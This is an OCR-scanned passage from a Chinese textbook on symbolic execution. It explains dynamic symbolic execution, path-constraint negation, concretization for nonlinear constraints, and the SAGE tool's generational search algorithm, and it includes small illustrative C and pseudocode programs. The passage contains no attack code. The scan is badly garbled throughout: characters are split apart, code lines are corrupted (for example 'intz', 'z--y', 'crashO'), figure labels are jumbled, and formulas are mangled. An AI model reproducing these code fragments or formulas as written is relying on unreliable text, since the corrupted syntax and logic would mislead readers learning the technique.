int double(int x) (return 2 * x; } 


void test. me(int x, int y) { 
intz = double(x); 
if (z==y) { 
if (y == x+10) 


abort(); /* error */ 
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符号 执行 ”路径 约 束 条 件 








Solve:2*x —y 


Solution: x= 1,y -2 











x-36y-99. } 
z=72 


创建 符号 
变量 x、y 


2*xt=y 








z=2*x |] 1 





图 5-7 符号 执行 约束 提取 过 程 3 
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2. 路 径 约束 条 件 取 反 求解 和 路 径 遍 历 算法 

通过 上 面 的 步骤 已 经 获取 了 执行 路 径 上 的 路 径 约 束 ,如 何 使 用 该 路 径 约 束 完成 对 程 
序 执行 树 的 遍历 呢 ? 可 以 将 其 概括 为 下 面 几 个 步骤 : 

CD 动态 执行 程序 提取 路 径 约束 poo o 

(2) 使 用 路 径 搜 索 算法 , 按 搜索 策略 对 路 径 中 的 约束 条 件 进 行 取 反 ,假设 这 里 对 b 进 
行 取 反 , 生 成 新 的 路 径 约束 条 件 pos. 

(3) 使 用 约束 求解 器 对 pecs 进行 求解 并 生成 新 的 测试 用 例 test, 。 

CD. 使 用 tests 对 程序 进行 测试 ,引导 程序 执行 b 所 在 条 件 语句 的 else( 或 then) 分 支 ， 
实现 对 b 所 在 条 件 分 支 的 完全 遍历 ,并 进入 新 的 子 树 区 域 进 行 探索 。 

以 图 5-7 为 例 , 路 径 约 东 条 件 为 pm 一 (2*x 一 y) 一 0, 因 为 pec。 中 只 有 一 个 约束 条 
件 , 所 以 不 需要 使 用 路 径 搜 索 算法 ,直接 对 其 中 的 约束 条 件 取 反 , 得 到 新 的 路 径 约 束 条 件 
表达 式 pc 一 (2* x—y==0) ,使 用 约束 求解 器 求解 pe, 得 到 一 组 可 行 解 为 x 一 1,y 一 2， 
使 用 该 用 例 就 可 以 对 if(y 王 一 x 十 10) 的 then 分 支 进行 遍历 。 

当 路 径 条 件 中 包含 多 个 约束 表达 式 时 ,例如 ,pc =q A qz 和 人 … 人 Ad',' 此 时 就 需要 按照 
一 定 的 策略 ,每 次 选取 部 分 约束 进行 变形 ,策略 的 选取 决定 了 动态 符号 执行 遍历 程序 所 有 
执行 路 径 的 效率 。 

DART 使 用 的 是 路 径 深 度 优先 遍历 算法 ,假设 pco =q: Ag 人 gs。 首先 对 执行 路 径 上 
的 最 后 一 个 约束 表达 式 进行 取 反 , 即 程 序 执行 过 程 中 提取 的 最 后 一 个 条 件 分 支 对 应 的 约 
束 表达 式 ,按照 策略 变形 后 的 路 径 条 件 为 pc =q Aq A qs。 假设 pc 有 一 组 可 行 解 为 
xl yl, 将 此 组 解 作为 输入 参数 再 次 执行 程序 ,得 到 新 的 路 径 约 束 条 件 为 pcs =q Aq A 
nq; Aq A qs ,继续 使 用 深度 搜索 算法 得 到 新 的 路 径 约束 条 件 pes =q A^ gs A ^q Aq 人 
了 gs， 求解 pes 并 再 次 执行 程序 。 重 复 上 面 的 过 程 直 至 完成 对 执行 树 的 遍历 。 

使 用 上 面 的 算法 或 其 他 路 径 搜 索 算 法 就 一 定 可 以 完成 对 执行 树 的 遍历 吗 ? 当初 始 用 
例 对 应 的 路 径 执行 终止 后 ,新 的 用 例 由 路 径 搜索 算法 生成 ,新 生成 用 例 实际 上 在 强制 让 程 
序 探索 一 条 未 被 探索 过 的 路 径 , 假 设 pc — qi A qz A qs ,完成 变形 后 的 路 径 约 束 为 pc = 
qi ^q; 人 一 q;, 即 ,理想 情况 下 新 生成 用 例会 指导 程序 在 下 次 实际 执行 时 在 qg 所 在 条 件 分 
支 处 进入 else 分 支 , 因 为 上 一 轮 执 行 遍历 的 是 then 分 支 。 

但 在 实际 执行 中 ,路 径 表 达 式 pc, 可 能 无 解 ,此 时 说 明 该 路 径 不 可 达 ; 也 可 能 程序 在 
执行 到 gs 前 就 进入 了 其 他 分 支 ,未 按照 预定 的 路 径 执行 ;还 有 一 种 最 坏 的 情况 是 对 程序 
的 测试 进入 循环 结构 ,始终 存在 未 完全 遍历 的 路 径 分 支 ,导致 测试 过 程 无 法 终止 。 无 论 是 
使 用 深度 搜索 算法 还 是 其 他 路 径 遍 历 算法 ,都 需要 辅 以 其 他 方法 指引 测试 遍历 未 覆盖 二 
的 路 径 和 代码 块 ,如 此 才能 保证 测试 的 高 效 。 如 何 让 路 径 搜索 更 加 高 效 一 直 是 动态 符号 
执行 研究 中 的 热点 ,对 于 循环 问题 会 在 5. 2. 4 节 中 进行 讨论 。 

下 面 使 用 实例 对 路 径 搜索 的 过 程 进 行 说 明 。 将 x 二 1,y 二 2 作为 输入 参数 执行 程序 ， 
并 重复 前 面 的 测试 过 程 ,如 图 5-8 所 示 。 

再 次 执行 到 条 件 分 支 if(z 王 一 y) 处 时 ,此 时 谓词 语句 z= — y 对 应 的 真 值 为 true, 程 
序 进入 分 支 后 会 执行 到 第 二 个 条 件 分 支 f(y 二 二 x 十 10) ,如 图 5-9 所 示 。 

因为 约束 表达 式 y 二 二 x 十 10 对 应 的 真 值 为 false, 所 以 未 进入 then 分 支 ,此 轮 具体 程 
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main 
int t1 = randomint(); 实际 执行 符号 执行 ”路 径 约 束 条 件 
intt2 = randomlnt(); 
test_me(t1,t2); 
} 


int double(int x) (return 2 * x; } 


void test. me(int x, int y) ( 




















创建 符号 
intz = double(x); x=1 ,y=2, 变量 x、y 
if (z==y){ 72 CELER d 
if (y == x*10) 
abort(); /* error */ 
} | 1 | 
} 
图 5-8 符号 执行 约束 提取 过 程 1 
mainh 
intt1 = randomint(); 实际 执行 符号 执行 路 径 约束 条 件 


intt2 = randomint(); 
test me(t1,t2); 
) 
int double(int x) (return 2 * x: } 

















void test. me(int x, int y) { iei 号 
intz = double(x); dE: 
KG x=1 ,y=2, 2=2*x 2*x=y 
if (y == x+10) =. 
abort(); /* error */ 
} 1 1 ! 
) 
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序 执行 结束 ,路 径 条 件 为 pc 一 (2* x —y— —0) A ^ Cy —á3F 100 ,使 用 路 径 搜索 策略 对 
路 径 条 件 变形 ,得 到 pes — (2 * x 一 y OAY x 十 10) ,求解 pes 得 到 一 组 可 行 解 为 
x 一 10,y 一 20, 整 个 过 程 如 图 5-10 所 示 。 

将 x—10.y—20 作为 参数 ,再 次 对 程序 进行 动态 符号 执行 测试 ,此 次 执行 程序 进入 if 
(y 三 三 x 十 10) 的 then 分 支 并 触发 程序 异常 ,如 图 5-11 所 示 。 

通过 上 面 几 轮 执行 ,动态 符号 执行 完成 对 程序 内 部 所 有 分 支 的 遍历 ,测试 完成 。 通 过 
实际 执行 结合 符号 执行 分 析 ,动态 符号 执行 技术 快速 定位 了 程序 内 部 的 问题 代码 。 

上 面 的 过 程 看 似 十 分 完美 ,可 以 自动 地 对 程序 进行 完整 的 程序 遍历 ,但 在 实际 执行 时 
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main( 
int t1 = randomint(); 实际 执行 符号 执行 ”路 径 约 束 条 件 
int t2 = randomint(); 
test_me(t1,t2); Solve: (2 * x = y) ^ (y = x +10) 
} r 
Solution: x = 10, y = 20 
int double(int x) (return 2 * x; ) 
void test me(int x, int y) ( 
创建 符号 
intz = double(x); 变量 x、y 
if (z==y) { 2*x==y 
if (y == x+10) y!=x+10 
abort(); /* error */ 
} x=1 ,y=2, pe 
: m po cg ! 
图 5-10 符号 执行 约束 提取 过 程 3 
i 
un 实际 执行 符号 执行 。 路 径 约束 条 件 
int t1 = randomint(); 
int t2 = randomint(); 
test me(t1,t2); 
) 
int double(int x) (return 2 * x; ) 
void test. me(int x, int y) ( 
创建 符号 
intz = double(x); EB x, y 
if (z==y) { 2*x—y 
i (y == x+10) x=10 , y=20, y==x+10 
abort(); /* error */ z-20 
) Y 
} 





图 5-11 符号 执行 约束 提取 过 程 4 


会 遇 到 很 多 问题 ,例如 外 部 函数 调用 、 非 线性 约束 求解 等 ,通常 只 能 通过 下 面 的 方式 对 问 
题 进行 简化 以 达到 解决 问题 的 目的 。 这 里 以 非 线 性 约束 求解 问题 来 说 明 解 决 方案 ,外 部 
函数 调用 等 问题 会 在 5. 2. 4 节 中 进行 说 明 。 

假设 约束 求解 器 只 能 求解 线性 约 东 ,对 于 下 面 的 示例 程序 ,假设 初始 值 为 x 王 3 和 
y=7 ,程序 执行 到 代码 z—x* x * x 处 时 ,z 的 实际 值 为 27, 符 号 表示 为 z 二 xx* x * x, 这 里 
出 现 了 非 线 性 的 表示 ,如 果 变 量 z 出 现在 程序 的 路 径 约 东 条 件 表达 式 中 ,求解 器 无 法 对 该 
路 径 约 东 条件 进行 求解 。 


void foo (int x,int y){ 
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int z-x* x* x; /* could be z-h(x) * / 
if(z--y)t 
abort(); /* ezxor* / 


y 
) 


对 于 非 线性 约束 无 法 求解 的 问题 该 如 何 处 理 呢 ? 为 了 继续 分 析 , 这 里 可 以 做 一 个 折 
中 ,既然 z 已 经 超出 了 分 析 范 围 , 就 用 具体 值 来 替换 符号 值 , 即 在 符号 执行 中 将 z 的 表示 
从 x*xx*x 换 为 27, 然 后 继续 后 面 的 指令 ,因为 y! 二 =z, 所 以 该 轮 执 行 完 成 ,符号 执行 引擎 
提取 的 路 径 约 束 条 件 为 pe — ^ (27 — — y) ,使 用 搜索 策略 对 路 径 约 束 取 反 得 到 pe, = 
(27 — — y) ,求解 路 径 约束 表达 式 , 下 一 轮 执行 的 程序 输入 即 为 x=3 和 y 二 27, 用 例 对 应 
的 执行 过 程 进入 if(z 一 一 y) 分 支 并 触发 程序 异常 。 

可 以 看 到 ,通过 折 中 方案 也 可 以 发 现 程序 中 大 部 分 的 异常 ,但 对 于 外 部 函数 调用 等 问 
题 ,这 样 的 解决 方案 对 分 析 精 度 的 影响 就 会 比较 大 。 


523 动态 符号 执行 工具 SAGE 


在 5.2.2 节 介 绍 了 动态 符号 执行 的 基本 原理 和 执行 流程 ,目前 大 多 数 动态 符号 执行 
工具 仍 需 要 在 程序 源 代码 的 基础 上 进行 ,程序 源 代码 可 以 为 分 析 工 具 提 供 更 多 的 数据 结 
构 等 信息 ,使 得 分 析 精 度 更 高 ,但 大 多 数 的 程序 源 代码 难以 获取 ,这 在 很 大 程度 上 限制 了 
动态 符号 执行 工具 的 使 用 场景 。 为 了 将 符号 执行 引擎 引入 真实 环境 使 用 ,微软 公司 的 
Patrice Godefroid 等 人 设计 并 实现 了 第 一 款 基 于 二 进 制 文件 的 符号 执行 引擎 SAGE , 
也 是 至 今 唯一 一 款 在 实际 生产 中 发 挥 重要 作用 的 基于 二 进 制 文件 的 符号 执行 工具 。 下 面 
就 对 SAGE 中 使 用 到 的 关键 技术 进行 介绍 。 

符号 执行 效率 的 最 大 制约 因素 就 是 路 径 爆炸 问题 。Wiki 百科 中 对 路 径 爆 炸 问题 的 
定义 为 :“Symbolically executing all feasible program paths does not scale to large 
programs. The number of feasible paths in a program grows exponentially with an 
increase in program size and can even be infinite in the case of programs with unbounded 
loop iterations. " 

因为 使 用 符号 执行 技术 对 程序 进行 分 析 时 ,每 一 个 分 支 语句 都 可 能 导致 分 析 过 程 新 
增 一 条 路 径 ,所 以 探索 路 径 的 数量 可 能 是 按 指数 级 增长 的 ,加 上 程序 中 部 分 循环 由 符号 变 
量 控制 ,这 也 直接 导致 对 程序 路 径 的 探索 可 能 是 无 法 终止 的 。 因 为 以 上 原因 ,系统 遍历 一 
个 大 型 应 用 程序 的 所 有 可 达 路 径 是 不 现实 的 ,这 也 就 是 通常 所 说 的 路 径 爆炸 问题 。 图 5-12 
就 是 路 径 爆 炸 问题 的 示例 ,从 这 段 简单 的 代码 中 找到 加 框 处 的 异常 需要 探索 数 亿 条 执行 
路 径 。 

通过 建立 函数 摘要 避免 函数 内 部 代码 展开 的 方法 看 似 提高 了 程序 测试 时 的 代码 覆盖 
率 ,缓解 了 路 径 爆 炸 问 题 ,但 这 是 以 损失 分 析 精 度 为 前 提 的 。 同 时 ,对 于 大 型 程序 动 辑 上 
亿 条 指令 的 规模 ,即使 使 用 函数 摘要 的 方法 ,如 果 没 有 良好 的 路 径 搜索 策略 也 是 无 法 有 效 
缓解 路 径 爆 炸 问 题 的 。 

除了 无 法 解决 路 径 爆 炸 问题 .目前 大 部 分 的 符号 执行 工具 在 基本 处 理 流程 上 都 是 “不 
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public void main(string s) { static bool contains(string s, string bf 
bool a = contains(s, " Hello"); if (s = null || t = null) return false; 
bool b = contains(s, " World"); for (int i = 0; i < s.Length-t.Length+1;i++) 
bool c = contains(s, "at"; if (containsAt(s, i, t)) return true; 
bool d = contains(s, "ISCAS Tech"); return false; 
if(a && b && c && d) ) 
throw new Exception("found it"); 
H static bool containsAt(string s, int i, string) { 
for (int j = 0; j < t.Length; j+) 
if (t[j] != s[i*j]) return false; 
return true; 
} 








图 5-12 路径 爆炸 问题 示例 


完美 的 ”: 使 用 符号 执行 技术 对 大 型 程序 进行 测试 时 ,其 分 析 精 度 很 容易 受到 程序 中 复杂 
执行 状态 的 影响 (例如 指针 操作 、 复 杂 的 数学 运算 ); 另 外 ,测试 程序 对 系统 函数 或 者 库 函 
数 的 调用 也 是 影响 分 析 准 确 性 的 重要 因素 。 总 之 , 当 符号 执行 无 法 分 析 时 ,大 部 分 工具 就 
会 采用 实际 值 蔡 换 的 方法 使 其 继续 进行 下 去 。 另 外 ,目前 大 部 分 的 动态 符号 执行 工具 都 
使 用 了 大 量 的 简化 操作 ,从 全 局 分 析 被 迫降 低 到 局 部 符号 分 析 ,但 即使 如 此 降低 分 析 精 度 
要 求 , 大 部 分 工具 也 很 难 在 有 限 的 时 间 和 费用 成 本 下 对 大 型 程序 进行 系统 、 完 整 的 分 析 。 
正 是 因为 这 些 原 因 , 目 前 随机 化 的 用 例 测试 仍然 是 软件 测试 使 用 的 主流 方法 。SAGE E 
是 在 这 样 的 背景 下 提出 的 。 下 面 就 对 SAGE 的 几 项 关键 技术 进行 介绍 。 

1. 分 代 搜 索 算 法 

SAGE 的 路 径 搜 索 算法 generation search( 分 代 搜 索 ) 是 其 技术 的 核心 ,SAGE 的 设 
计 人 员 对 搜索 算法 的 设计 提出 下 面 几 点 要 求 : 

A) 在 避免 完 余 用 例 的 同时 ,从 单 次 程序 执行 对 应 的 路 径 约 束 条 件 结果 中 尽 可 能 多 
地 生成 的 新 测试 用 例 。 

(2) 尽 可 能 快 地 实现 最 大 化 代码 覆盖 率 ,但 不 同 于 其 他 的 路 径 搜索 策略 ,这 里 的 最 大 
化 代码 覆盖 是 以 保证 漏洞 的 快速 挖掘 为 前 提 的 。 

CD 对 于 路 径 探索 中 出 现 的 背离 问题 是 有 容错 性 的 , 当 背 离 出 现时 ,符号 执行 能 够 快 
速 恢 复 正 常 状 态 并 继续 执行 。 

在 介绍 具体 算法 前 ,首先 对 动态 符号 执行 中 的 路 径 搜索 背离 (divergence) 问 题 进 行 说 
明 。 对 于 路 径 约束 pc 二 qi Aq: ^ ”9qs 生 成 的 测试 用 例 input ,理想 情况 下 ,程序 将 input, 
作为 输入 实际 执行 时 应 该 先后 经 过 谓词 qi qe 、q; 所 在 的 条 件 分 支 , 并 探索 g; 所 在 条 件 语 
句 处 未 被 遍历 过 的 else 分 支 。 但 在 实际 情况 中 ,程序 很 可 能 按照 qi ,qz ,…,q, 所 在 的 分 支 
序列 执行 而 背离 了 预期 路 径 ,这 就 是 动态 符号 执行 中 的 背离 现象 。 为 了 检测 背离 问题 的 
存在 ,可 以 在 符号 执行 过 程 中 使 用 一 个 向 量 记录 程序 实际 执行 时 经 过 的 分 支 ,如 果 与 
input 对 应 的 预测 执行 向 量 不 匹配 , 则 说 明 执 行 过 程 存 在 路 径 背 离 。 

分 代 搜 索 算 法 的 主体 结构 分 为 主流 程 Search 和 路 径 扩 展 ExpandExecution 两 部 分 。 

D 路 径 搜索 算法 主流 程 

图 5-13 是 分 代 搜索 的 主流 程 。 首 次 执行 算法 时 先 将 初始 用 例 inputSeed 放 入 工作 和 集 
合 序列 workList 中 (第 3 行 ), 以 inputSeed 作为 初始 输入 实际 执行 程序 并 检测 inputSeed 
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是 否 触发 了 程序 异常 (第 4 行 )。while 循环 是 算法 的 主体 部 分 , 当 workList 中 不 为 空 时 
(第 5 行 ), 从 workList 中 选择 第 一 个 测试 用 例文 件 (第 6 行 ) ,将 其 作为 ExpandExecution 
函数 的 输入 ,并 根据 其 执行 路 径 求 解 得 到 子 测 试用 例 集 合 childInputs( 第 7 行 )。 为 了 避 
免 对 程序 块 的 元 余 探 索 ,对 于 新 得 到 的 测试 用 例 集合 ,SAGE 不 会 全 部 添加 到 workList 
中 ,首先 运行 测试 用 例 ,监控 其 执行 过 程 中 的 程序 基本 块 覆盖 情况 ,同时 检查 该 用 例 是 否 
能 够 触发 异常 (第 10 行 ), 然 后 使 用 Score 函数 根据 用 例 的 基本 块 覆盖 信息 对 该 用 例 进 行 
评分 (第 11 行 ), 并 按照 评分 将 用 例 插 入 到 workList 列表 中 。 








Search(inputSeed) { 
inputSeed.bound = 0; 
workList = (inputSced] ; 
Run&Check(inputSced); 
while ( workList not empty ) ( // new children 
input = PickFirstItem(workList); 
childInputs = ExpandExecution(input); 
while ( childInputs not empty) 1 
newInput = PickOneltem(childInputs); 
10 Run&Check(newInput); 
11 Score(newInput); 
12 workList = workList + newInput; 


oemwhweb 一 








图 5-13 Search 算法 


2) 路 径 扩展 算法 

ExpandExecution 函数 是 分 代 搜 索 算 法 的 核心 ,该 算法 的 设计 目标 是 以 最 快 的 速度 
尽 可 能 多 地 覆盖 指令 代码 块 。 首 先 将 input 作为 符号 输入 对 程序 进行 离线 的 符号 执行 操 
作 ,并 生成 对 应 的 路 径 约束 PC( 第 4 行 ),PC 是 |PC| 个 约束 条 件 的 集合 ,其 中 每 个 约束 条 
件 对 应 程序 执行 路 径 上 的 一 个 条 件 分 支 语 句 ,ExpandExecution 算法 设计 的 初衷 就 是 改 
变 深 度 或 广度 搜索 一 次 只 探索 一 个 分 支 的 局 限 性 (或 者 只 遍历 一 条 路 径 的 策略 ), 而 是 一 
次 性 地 对 PC 中 的 所 有 约束 条 件 进 行 探索 (第 6 行 ), 如 图 5-14 所 示 , 对 于 PC 中 所 有 的 约 
束 进行 相同 的 操作 。 首 先 对 PC 中 第 j 个 约束 取 反 得 到 not(PC[j]) ,并 和 PC 的 前 j 个 约 
3 PCLO.. 4Gj 一 1)] 合 并 成 新 的 路 径 约束 ,使 用 约束 求解 求 得 一 组 可 行 解 I( 第 6 行 ), 并 生 
成 新 的 测试 用 例 newInput( 第 7 行 ) ,设置 newInput 的 约束 起 始 界限 值 bound 为 j (第 8 
行 ) ,并 将 newInput 添加 到 新 用 例 集合 childInputs 中 (第 9 行 )。childInputs 就 是 根据 
input 得 到 的 路 径 约束 一 次 性 求解 得 到 的 所 有 测试 用 例 。 整 个 过 程 就 像 是 从 父 路 径 上 的 
所 有 节点 生出 子路 径 , 所 以 设计 者 称 其 为 分 代 搜索 。 

对 于 图 5-15 中 的 测试 程序 ,指定 初始 输入 inputSeed 为 “good”,inputseed. bound 的 
初始 值 为 0, 经 过 第 一 层 分 代 搜 索 后 生成 4 个 测试 用 例 *bood”gaod”“godd” 和 “goo!1”, 这 
4 个 用 例 是 对 “good” 对 应 路 径 上 的 4 个 条 件 分 支 分 别 取 反 求解 得 到 的 ,如 图 5-15 所 示 。 
对 程序 整个 执行 树 空间 的 遍历 如 图 5-16 所 示 ,用 例 上 方 的 数字 是 其 生成 时 对 应 的 分 代 搜 
索 层 数 。 

分 代 搜 索 算 法 中 有 几 点 内 容 需 要 特别 说 明 : 


第 5 章 符号 执行 





1 ExpandExecution(input) { 

2 childInputs= {}; 

3 /symbolically execute (program, input) 

4 PC = ComputePathConstraint(input); 

5 for(j-input.bound; j < |PC]; j++ ) { 

6 — if((PC[0..j-1)] and not (PC[j])) has a solution I) { 
mJ newInput = input + I; 

8 newInput.bound = j; 

9 childInputs = childInputs + newInput; } 

10 } 


2 return childInputs; parent Gen 1 








Æ 5-14 ExpandExecution 算法 











1 void top(char input[4]) { input = "good" 

2 intent-0; path constraint: 

3 "b" ent; 

4 a") enti; 

5 ) cnt++; 

6 ') cnt++; 

7 这 (cnt>= 3) crash(); 

8j good 











图 5-15 分 代 搜索 算法 实例 


void top(char input[4]) 
t 
int cnt = 0; 
if Cinput[0] == 'b') cnt++; 
if Cinput[1] == 'a') cnte«; 
if Cinput[2] == 'd') cnte«; 
if Cinput[3] == '!') cnt++i 
if (cnt >= 3) crashO; 





0 1 1 2 1 2 2 3 1 2 2 3 2 3 3 4 
good goo! godd god! gaod gao! gadd gad! badd boo! bodd bod! baod bao! badd bad! 


图 5-16 执行 树 实例 


(1) input. bound 变量 。 

ExpandExecution 算法 中 bound 变量 的 作用 是 什么 呢 ? 简单 来 说 ,为 newInput 设置 
bound 变量 ,就 是 为 了 防止 对 其 进行 路 径 搜 索 时 回溯 newInput 的 父 用 例 input 已 经 遍历 
过 的 执行 空间 ,生成 元 余 的 测试 用 例 。 分 代 搜 索 策略 加 上 bound 变量 的 使 用 满足 了 算法 


se 
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的 第 一 条 设计 要 求 。 

(2) Score IRA. 

Score 函数 计算 的 是 程序 执行 用 例 newInput 时 新 覆盖 的 程序 基本 块 的 数量 (和 其 比 
较 的 是 之 前 已 经 执行 的 所 有 用 例 覆盖 过 的 程序 基本 块 )。 例 如 ,一 个 newInput 覆盖 了 
100 个 新 的 程序 基本 块 , 则 Score 给 其 评分 为 100, 后 面 会 根据 其 分 数 将 其 插入 workList 
中 。SAGE 在 下 轮 执行 时 会 从 workList 列表 中 选 出 评分 最 高 的 用 例 ,这 样 就 能 保证 每 一 
轮 都 能 够 最 大 化 地 遍历 未 探索 过 的 基本 块 。 以 上 的 设计 使 得 分 代 搜索 算法 更 好 地 满足 了 
设计 要 求 的 第 二 条 。 

同时 ,Score 函数 的 设计 还 有 效 地 解决 了 背离 问题 。 如 果 路 径 遍 历时 产生 的 分 歧 只 
是 使 探索 方向 偏离 预期 ,但 仍然 能 够 正常 地 遍历 未 覆盖 的 程序 模块 ,这 并 没有 多 大 的 负面 
影响 。 但 是 ,通常 情况 下 路 径 背 离 问 题 很 可 能 阻止 路 径 遍 历 算法 向 未 探索 的 区 域 前 进 , 陷 
入 死 循 环 。 例 如 在 深度 搜索 算法 中 ,一 个 测试 用 例 很 可 能 使 得 执行 路 径 未 按照 预期 去 探 
索 p 分 支 而 是 转向 到 之 前 已 经 探索 过 的 p "分支 ,这 会 使 下 面 的 遍历 在 p 至 p' 的 路 径 中 无 
限 循环 ,这 也 是 深度 搜索 时 的 常见 问题 。 分 代 搜索 算法 则 能 对 路 径 背 离 问题 进行 容错 ,并 
快速 恢复 到 正常 的 探索 状态 。 因 为 每 一 轮 分 代 搜 索 会 生成 大 量 的 子 用 例 对 路 径 上 的 所 有 
分 支 进行 遍历 ,而 不 是 类 似 于 深度 搜索 或 者 广度 搜索 算法 只 生成 一 个 用 例 对 一 个 分 支 进 
行 探索 , 当 有 一 个 用 例 在 执行 时 出 现 了 背离 现象 时 ,Score 函数 对 其 的 评分 就 为 0,SAGE 
能 够 马上 知道 该 用 例 为 无 效用 例 , 从 而 避免 将 用 例 添加 到 workList 中 ,防止 系统 对 其 进 
行 ExpandExecution 操作 ,因此 有 效 避 兔 了 背离 问题 对 下 面 的 探索 过 程 的 影响 。Score 
函数 的 存在 使 得 分 代 搜索 算法 满足 了 设计 要 求 的 第 三 条 。 

2. SAGE 系统 

上 面 的 路 径 搜索 算法 被 实现 于 工具 SAGE 中 。SAGE 可 以 测试 Windows 系统 下 任 
意 的 文件 读 取 程 序 ,将 输入 文件 中 的 每 个 字 节 分 别 符号 化 。SAGE 的 另外 一 个 关键 创新 
就 是 该 系统 的 符号 执行 是 基于 程序 执行 路 径 上 的 x86 指令 序列 trace 进行 离线 分 析 的 。 
下 面 就 来 说 明 这 样 的 设计 是 怎样 使 得 SAGE 可 以 对 大 型 应 用 程序 进行 分 析 的 。 基 于 x86 
指令 的 设计 思路 相对 于 基于 源 代 码 的 分 析 方法 , 毫 无 疑问 增加 了 分 析 的 难度 ,设计 者 如 何 
解决 遇 到 的 问 难 也 会 在 下 面 进行 详细 的 介绍 。 除 了 解决 前 面 的 问题 ,设计 者 针对 大 型 应 
用 程序 还 提出 了 一 些 至 关 重 要 的 优化 策略 ,本 节 也 会 做 出 介绍 。 

1) 系统 架构 

图 5-17 是 SAGE 的 系统 架构 。 

SAGE 通过 重复 4 个 任务 来 实现 分 代 搜索 算法 ,这 4 个 任务 对 应 系统 的 4 个 模块 ,分 
别 为 测试 模块 (Tester ) ,执行 路 径 记 录 模 块 (Tracer ) ,覆盖 率 收集 模块 (CoverageCollector) | ff 
号 执行 模块 (SymbolicExecutor) 。 

测试 模块 Tester 实现 的 是 Run&Check 函数 的 功能 ,使 用 一 个 测试 用 例 作为 输入 对 
程序 进行 检测 ,监控 其 在 执行 过 程 中 是 否 出 现 内 存 访 问 异 常 等 错误 导致 程序 崩溃 。 只 有 
当 该 用 例 未 触发 任何 错误 时 才 对 其 进行 剩 下 的 处 理 步 又 ,否则 记录 该 测试 用 例 , 并 从 未 测 
试用 例 集 合 中 选择 新 的 用 例 进 入 Tester 模块 的 执行 。 

执行 路 径 记 录 模 块 Tracer 将 Tester 传递 来 的 测试 用 例 作为 输入 ,再 次 执行 待 测试 
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外 部 输入 


inputo 


Tester 


程序 ,但 不 同 于 Tester 的 是 ,此 次 执行 程序 过 程 中 需要 记录 程序 的 运行 状态 (log) ,这 个 
log 文件 可 以 被 剩 下 的 分 析 模 块 用 来 重 放 程序 运行 过 程 ,方便 对 程序 进行 离线 分 析 。 
Tracer 模块 是 基于 IDNA 开发 的 ,可 以 对 程序 进行 机 器 码 级 别 的 执行 路 径 记录 。 

覆盖 率 收集 模块 CoverageCollector 重 放 程 序 执行 记录 ,计算 此 次 执行 过 程 中 基本 块 
的 覆盖 情况 。SAGE 使 用 基本 块 覆盖 信息 来 实现 前 面 算法 中 提 到 的 Score 函数 。 

符号 执行 模块 SymbolicExecutor 实现 了 算法 中 的 ExpandExecution 函数 ,通过 再 次 
重 放 执行 记 录 对 程序 进行 符号 执行 分 析 ,提取 路 径 条 件 约束 ,并 生成 新 的 测试 用 例 。 

CoverageCollector 和 SymbolicExecutor 模块 都 是 基于 执行 记录 重 放 框 架 TruScan 
实现 的 ,TruScan 可 以 使 用 iDNA 记录 的 程序 执行 状态 文件 对 程序 运行 过 程 进行 重 放 , 即 
让 程序 重复 前 面 记 录 的 执行 过 程 ,保证 执行 过 程 中 的 每 一 点 都 是 一 致 的 。TruScan 提供 
的 一 些 反 汇 编 接口 ,符号 表 、 输 入 输出 监控 等 都 为 符号 执行 的 实现 提供 了 可 能 。 

2) 技术 核心 

SAGE 为 什么 要 选择 基于 x86 机 器 指令 实现 动态 符号 执行 分 析 呢 ?主要 因为 以 下 
3 点 原因 

(1) 种 类 繁多 的 编程 语言 。 基 于 源 代 码 的 分 析 需 要 针对 不 同 的 编程 语言 和 语法 进行 

的 分 析 , 有 些 甚 至 需要 考虑 到 特定 的 编译 器 。 对 于 新 出 现 的 语言 如 果 要 进行 符号 执 
行 分 析 又 要 重复 之 前 的 工作 ,这 样 做 是 很 浪费 时 间 的 。 如 果 直 接 对 机 器 码 进行 分 析 就 可 
以 屏蔽 不 同 编程 语言 、 编 译 器 及 编译 平台 对 分 析 过 程 的 影响 ,机 器 码 的 种 类 相对 更 少 。 
x86 是 由 Intel 公司 推出 的 一 种 机 器 指令 集 , 现 在 被 广泛 运用 到 PC 端 , Windows, Linux 
等 操作 系统 大 多 数 是 基于 x86 指令 集 的 。 

(2) 编译 过 程 修改 了 程序 的 实际 行为 。 在 源 代 码 中 分 析 得 到 的 软件 漏洞 可 能 只 存在 
于 编译 前 的 阶段 ,编译 器 编译 过 程 对 指令 做 出 的 优化 .代码 混 清 、 基 本 块 转换 都 可 能 使 编 
译 前 后 的 代码 语义 发 生变 化 ,直接 导致 实际 产品 根本 就 无 法 触发 漏洞 ,而 在 源 代 码 中 未 发 
现 的 漏洞 因为 程序 编译 而 出 现 。 基 于 机 器 指令 的 分 析 则 可 以 确定 程序 实际 存在 的 漏洞 。 

(3) 软件 代码 未 开源 。 大 多 数 情 况 下 ,软件 的 源 代码 或 者 第 三 方 链接 库 的 代码 都 是 
无 法 获取 的 ,即使 测试 和 开发 团队 同属 于 一 个 公司 ,也 极 有 可 能 出 现 这 样 的 情况 。 

那么 ,基于 x86 机 器 指令 的 符号 执行 过 程 和 基于 源 代码 的 有 什么 区 别 ? 需要 解决 哪 
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些 特别 的 问题 ? 下 面 对 这 部 分 进行 详细 的 说 明 。 

(1) 基于 程序 执行 记录 的 离线 分 析 。 

在 线 的 符号 分 析 通 常 需要 向 程序 源码 中 插入 监控 指令 ,或 者 借助 动态 插 装 工具 (例如 
Nirvana 或 Valgrind,Catchconv 就 是 使 用 了 后 者 ) 进 行 分 析 。SAGE 没有 选择 在 线 分 析 
主要 有 两 个 原因 

。 一 个 程序 中 涉及 大 量 的 二 进 制 程序 组 件 , 这 些 组 件 中 的 很 大 一 部 分 可 能 是 被 操作 

系统 保护 (内 核 指 令 ) 或 者 是 经 过 混淆 的 代码 ,通过 静态 或 者 动态 插 装 都 是 很 难 分 
析 这 部 分 指令 的 ,所 以 SAGE 采取 对 全 系统 指令 进行 监控 和 重 放 的 方法 以 解决 这 
个 问题 。 
大 型 程序 中 一 些 复杂 路 径 很 可 能 导致 在 线 分 析 过 程 中 约束 表达 的 生成 或 提取 发 
生 错 误 , 从 而 使 得 分 析 程 序 无 法 正常 终止 。 同 时 在 线 分 析 的 情况 下 也 无 法 重 现 导 
致 问 题 出 现 的 路 径 执 行情 况 , 无 法 找到 问题 存在 的 根本 原因 。SAGE 采用 离线 分 
析 的 方法 ,在 程序 执行 记录 重 放 的 过 程 中 采用 符号 执行 技术 进行 分 析 , 通 过 监控 
